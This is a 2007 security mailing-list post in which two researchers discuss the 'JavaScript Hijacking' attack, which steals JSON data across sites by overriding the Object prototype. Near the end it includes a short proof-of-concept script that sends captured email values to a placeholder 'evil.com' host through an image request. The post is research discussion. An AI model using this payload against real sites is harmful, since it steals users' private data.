Secure Coding mailing list archives
JavaScript Hijacking
From: stefano.dipaola at wisec.it (Stefano Di Paola)
Date: Tue, 03 Apr 2007 18:30:11 +0200
Hi Brian, Il giorno lun, 02/04/2007 alle 12.13 -0700, Brian Chess ha scritto:
Hi Stefano, Yes, we are aware of your paper, but we intentionally chose to omit the reference because we are quite snobby. I'm joking!
:DD lol
The difference between what you discuss and JavaScript Hijacking is that we do not assume the presence of another defect. JavaScript Hijacking does not require the existence of a cross-site scripting vulnerability or the like. It's a new attack technique (and a new vulnerable code pattern), not a new method for exploiting an existing class of vulnerabilities.
Ok I see the difference. You are taking advantage of a pure json CSRF with a evil script which contains a modified version of the Object prototype. And when the callback function is executed you use a XMLHttpRequest in order to send the information extracted by the instantiated object. Well i can see that you don't require a XSS vuln on a host, but you assume a vulnerability on a user who has to click on a link :) Anyway, if there's a html injection on a 3rd site you could use an iframe with an evil page like the one you described without waiting for a user to click on an untrusted link. Or, if you cant use iframes, as XMLHttpRequest is restricted by same origin policy, you dont need an evil page since you could use a XSS vulnerable site as a vector in order to steal json informations with an img tag. -- <script> function Object(){ this.email setter = captureObject; } function captureObject(x){ (new Image()).src='http:// evil. com/ collect?email='+x; } </script> <script src='http:// vuln /json.js' ></script> -- But this is just another way to accomplish your attack. BTW very nice paper! Regards, Stefano
Thanks, Brian
-- ...oOOo...oOOo.... Stefano Di Paola Software & Security Engineer Web: www.wisec.it .................. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Questa =?ISO-8859-1?Q?=E8?= una parte del messaggio firmata digitalmente Url : http://krvw.com/pipermail/sc-l/attachments/20070403/706dee87/attachment.bin
Current thread:
- JavaScript Hijacking Brian Chess (Apr 01)
- <Possible follow-ups>
- JavaScript Hijacking Stefano Di Paola (Apr 02)
- JavaScript Hijacking Brian Chess (Apr 02)
- JavaScript Hijacking Stefano Di Paola (Apr 03)
- JavaScript Hijacking Frederik De Keukelaere (Apr 05)
- Foundations of Security: What Every Programmer Needs to Know McGovern, James F (HTSC, IT) (Apr 04)
- JavaScript Hijacking Brian Chess (Apr 02)
- JavaScript Hijacking Brian Chess (Apr 19)